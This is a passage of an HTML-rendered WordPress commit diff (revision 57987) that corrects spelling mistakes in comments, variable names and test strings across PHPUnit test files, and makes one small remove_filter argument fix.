</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * This can be used to ensure a file that is implictly relied on in a test exists
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * This can be used to ensure a file that is implicitly relied on in a test exists
</ins><span class="cx" style="display: block; padding: 0 10px"> * without it having to be built.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $file The file name.
</span></span></pre></div>
<a id="trunktestsphpunitincludesfactoryclasswpunittestfactoryforthingphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -155,7 +155,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @param array|null $callbacks Optional. Array with callbacks to apply on the fields.
</span><span class="cx" style="display: block; padding: 0 10px"> * Default null.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return array|WP_Error Combined array on success. WP_Error when default value is incorrent.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return array|WP_Error Combined array on success. WP_Error when default value is incorrect.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function generate_args( $args = array(), $generation_definitions = null, &$callbacks = null ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $callbacks = array();
</span></span></pre></div>
<a id="trunktestsphpunitincludesnormalizexmlxsl"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/includes/normalize-xml.xsl</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/includes/normalize-xml.xsl 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/includes/normalize-xml.xsl 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -3,7 +3,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> Normalize an XML document to make it easier to compare whether 2 documents will
</span><span class="cx" style="display: block; padding: 0 10px"> be seen as "equal" to an XML processor.
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- The normalization is similiar, in spirit, to {@link https://www.w3.org/TR/xml-c14n11/ Canonical XML},
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ The normalization is similar, in spirit, to {@link https://www.w3.org/TR/xml-c14n11/ Canonical XML},
</ins><span class="cx" style="display: block; padding: 0 10px"> but without some aspects of C14N that make the kinds of assertions we need difficult.
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> For example, the following XML documents will be interpreted the same by an XML processor,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -23,7 +23,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> >
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> <!--
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- Output UTF-8 XML, no indendation and all CDATA sections replaced with their character content.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ Output UTF-8 XML, no indentation and all CDATA sections replaced with their character content.
</ins><span class="cx" style="display: block; padding: 0 10px"> -->
</span><span class="cx" style="display: block; padding: 0 10px"> <xsl:output
</span><span class="cx" style="display: block; padding: 0 10px"> method='xml'
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -61,12 +61,12 @@
</span><span class="cx" style="display: block; padding: 0 10px"> </xsl:template>
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> <!--
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- Strip comments.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ Strip comments.
</ins><span class="cx" style="display: block; padding: 0 10px"> -->
</span><span class="cx" style="display: block; padding: 0 10px"> <xsl:template match='comment()' priority='10' />
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> <!--
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- Pass all other nodes through unchanged.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ Pass all other nodes through unchanged.
</ins><span class="cx" style="display: block; padding: 0 10px"> -->
</span><span class="cx" style="display: block; padding: 0 10px"> <xsl:template match='node()'>
</span><span class="cx" style="display: block; padding: 0 10px"> <xsl:copy>
</span></span></pre></div>
<a id="trunktestsphpunitincludestestcaseajaxphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/includes/testcase-ajax.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/includes/testcase-ajax.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/includes/testcase-ajax.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -133,7 +133,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Sets up the test fixture.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Overrides wp_die(), pretends to be Ajax, and suppresses E_WARNINGs.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Overrides wp_die(), pretends to be Ajax, and suppresses warnings.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function set_up() {
</span><span class="cx" style="display: block; padding: 0 10px"> parent::set_up();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -161,7 +161,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $_GET = array();
</span><span class="cx" style="display: block; padding: 0 10px"> unset( $GLOBALS['post'] );
</span><span class="cx" style="display: block; padding: 0 10px"> unset( $GLOBALS['comment'] );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- remove_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1, 1 );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ remove_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1 );
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_action( 'clear_auth_cookie', array( $this, 'logout' ) );
</span><span class="cx" style="display: block; padding: 0 10px"> error_reporting( $this->_error_level );
</span><span class="cx" style="display: block; padding: 0 10px"> set_current_screen( 'front' );
</span></span></pre></div>
<a id="trunktestsphpunittestsactionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/actions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/actions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/actions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -613,7 +613,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 17817
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * This specificaly addresses the concern raised at
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * This specifically addresses the concern raised at
</ins><span class="cx" style="display: block; padding: 0 10px"> * https://core.trac.wordpress.org/ticket/17817#comment:52
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers ::remove_filter
</span></span></pre></div>
<a id="trunktestsphpunittestsajaxwpAjaxParseMediaShortcodephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -42,7 +42,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $_POST = array_merge(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'action' => 'paser-media-shortcode',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'action' => 'parse-media-shortcode',
</ins><span class="cx" style="display: block; padding: 0 10px"> 'type' => '',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> $payload
</span></span></pre></div>
<a id="trunktestsphpunittestsajaxwpAjaxResponsephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -21,7 +21,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Set up the test fixture.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Override wp_die(), pretend to be ajax, and suppres E_WARNINGs
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Override wp_die(), pretend to be ajax, and suppress warnings.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function set_up() {
</span><span class="cx" style="display: block; padding: 0 10px"> parent::set_up();
</span></span></pre></div>
<a id="trunktestsphpunittestsauthphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/auth.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/auth.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/auth.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -149,8 +149,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $password = "pass with new line \n";
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertTrue( wp_check_password( 'pass with new line', wp_hash_password( $password ) ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $password = "pass with vertial tab o_O\x0B";
- $this->assertTrue( wp_check_password( 'pass with vertial tab o_O', wp_hash_password( $password ) ) );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $password = "pass with vertical tab o_O\x0B";
+ $this->assertTrue( wp_check_password( 'pass with vertical tab o_O', wp_hash_password( $password ) ) );
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span></span></pre></div>
<a id="trunktestsphpunittestsblocksregisterphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/blocks/register.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/blocks/register.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/blocks/register.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -888,7 +888,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> DIR_TESTDATA . '/blocks/notice',
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'name' => 'tests/notice-with-overrides',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'title' => 'Overriden title',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'title' => 'Overridden title',
</ins><span class="cx" style="display: block; padding: 0 10px"> 'style' => array( 'tests-notice-style-overridden' ),
</span><span class="cx" style="display: block; padding: 0 10px"> )
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -896,7 +896,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertInstanceOf( 'WP_Block_Type', $result, 'The block was not registered' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 2, $result->api_version, 'The API version is incorrect' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'tests/notice-with-overrides', $result->name, 'The block name was not overridden' );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $this->assertSame( 'Overriden title', $result->title, 'The block title was not overridden' );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $this->assertSame( 'Overridden title', $result->title, 'The block title was not overridden' );
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSameSets(
</span><span class="cx" style="display: block; padding: 0 10px"> array( 'tests-notice-editor-script' ),
</span><span class="cx" style="display: block; padding: 0 10px"> $result->editor_script_handles,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -937,7 +937,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'no block.json file and no name argument' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'file' => '', // No block.json file.
</span><span class="cx" style="display: block; padding: 0 10px"> 'args' => array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'title' => 'Overriden title',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'title' => 'Overridden title',
</ins><span class="cx" style="display: block; padding: 0 10px"> 'style' => array( 'tests-notice-style-overridden' ),
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -950,7 +950,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // A file that exists but is empty. This will bypass the file_exists() check.
</span><span class="cx" style="display: block; padding: 0 10px"> 'file' => DIR_TESTDATA . '/blocks/notice/block.js',
</span><span class="cx" style="display: block; padding: 0 10px"> 'args' => array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'title' => 'Overriden title',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'title' => 'Overridden title',
</ins><span class="cx" style="display: block; padding: 0 10px"> 'style' => array( 'tests-notice-style-overridden' ),
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span></span></pre></div>
<a id="trunktestsphpunittestsblockssupportedStylesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/blocks/supportedStyles.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/blocks/supportedStyles.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/blocks/supportedStyles.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -169,7 +169,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'attrs' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'textColor' => 'red',
</span><span class="cx" style="display: block; padding: 0 10px"> 'backgroundColor' => 'black',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // The following should not be applied (subcatagories of color support).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // The following should not be applied (subcategories of color support).
</ins><span class="cx" style="display: block; padding: 0 10px"> 'gradient' => 'some-gradient',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> 'innerBlock' => array(),
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -203,7 +203,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'color' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'text' => '#000',
</span><span class="cx" style="display: block; padding: 0 10px"> 'background' => '#fff',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // The following should not be applied (subcatagories of color support).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // The following should not be applied (subcategories of color support).
</ins><span class="cx" style="display: block; padding: 0 10px"> 'gradient' => 'some-gradient',
</span><span class="cx" style="display: block; padding: 0 10px"> 'style' => array( 'color' => array( 'link' => '#fff' ) ),
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span></span></pre></div>
<a id="trunktestsphpunittestsblockswpBlockTypephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/blocks/wpBlockType.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/blocks/wpBlockType.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/blocks/wpBlockType.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -306,7 +306,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45097
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_has_block_with_invalid_content() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // some content with invalid HMTL comments and a single valid block.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // some content with invalid HTML comments and a single valid block.
</ins><span class="cx" style="display: block; padding: 0 10px"> $invalid_content = 'before' .
</span><span class="cx" style="display: block; padding: 0 10px"> '<!- - wp:core/weird-space --><!-- /wp:core/weird-space -->' .
</span><span class="cx" style="display: block; padding: 0 10px"> '<!--wp:core/untrimmed-left --><!-- /wp:core/untrimmed -->' .
</span></span></pre></div>
<a id="trunktestsphpunittestscachephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/cache.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/cache.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/cache.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -357,7 +357,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $val2 = 'val2';
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> if ( ! is_multisite() ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Single site ingnores switch_to_blog().
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Single site ignores switch_to_blog().
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertTrue( $this->cache->set( $key, $val ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $val, $this->cache->get( $key ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->cache->switch_to_blog( 999 );
</span></span></pre></div>
<a id="trunktestsphpunittestscommentgetPageOfCommentphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/comment/getPageOfComment.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/comment/getPageOfComment.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/comment/getPageOfComment.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -306,8 +306,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $comment_children[ $i ] = $child;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $page_1_indicies = array( 2, 3, 4 );
- $page_2_indicies = array( 0, 1 );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $page_1_indices = array( 2, 3, 4 );
+ $page_2_indices = array( 0, 1 );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $args = array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'per_page' => 3,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -314,12 +314,12 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'max_depth' => 2,
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- foreach ( $page_1_indicies as $p1i ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ foreach ( $page_1_indices as $p1i ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 1, (int) get_page_of_comment( $comment_parents[ $p1i ], $args ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 1, (int) get_page_of_comment( $comment_children[ $p1i ], $args ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- foreach ( $page_2_indicies as $p2i ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ foreach ( $page_2_indices as $p2i ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 2, (int) get_page_of_comment( $comment_parents[ $p2i ], $args ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 2, (int) get_page_of_comment( $comment_children[ $p2i ], $args ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestscronphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/cron.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/cron.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/cron.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -915,7 +915,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> return new WP_Error(
</span><span class="cx" style="display: block; padding: 0 10px"> 'my_error',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'An error ocurred'
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'An error occurred'
</ins><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> };
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -947,7 +947,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> return new WP_Error(
</span><span class="cx" style="display: block; padding: 0 10px"> 'my_error',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'An error ocurred'
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'An error occurred'
</ins><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> };
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1112,7 +1112,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> return new WP_Error(
</span><span class="cx" style="display: block; padding: 0 10px"> 'my_error',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'An error ocurred'
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'An error occurred'
</ins><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> };
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1137,7 +1137,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> return new WP_Error(
</span><span class="cx" style="display: block; padding: 0 10px"> 'my_error',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'An error ocurred'
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'An error occurred'
</ins><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> };
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsdbdbDeltaphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/db/dbDelta.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/db/dbDelta.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/db/dbDelta.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -735,7 +735,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 20263
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_key_and_index_and_fulltext_key_and_fulltext_index_and_unique_key_and_unique_index_indicies() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_key_and_index_and_fulltext_key_and_fulltext_index_and_unique_key_and_unique_index_indices() {
</ins><span class="cx" style="display: block; padding: 0 10px"> global $wpdb;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $schema = "
</span></span></pre></div>
<a id="trunktestsphpunittestsdbphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/db.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/db.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/db.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -573,10 +573,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Test the `get_col()` method.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @param string|null $query The query to run.
- * @param string|array $expected The expected resulting value.
- * @param arrray|string|null $last_result The value to assign to `$wpdb->last_result`.
- * @param int|string $column The column index to retrieve.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @param string|null $query The query to run.
+ * @param string|array $expected The expected resulting value.
+ * @param array|string|null $last_result The value to assign to `$wpdb->last_result`.
+ * @param int|string $column The column index to retrieve.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @dataProvider data_get_col
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -607,10 +607,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @return array {
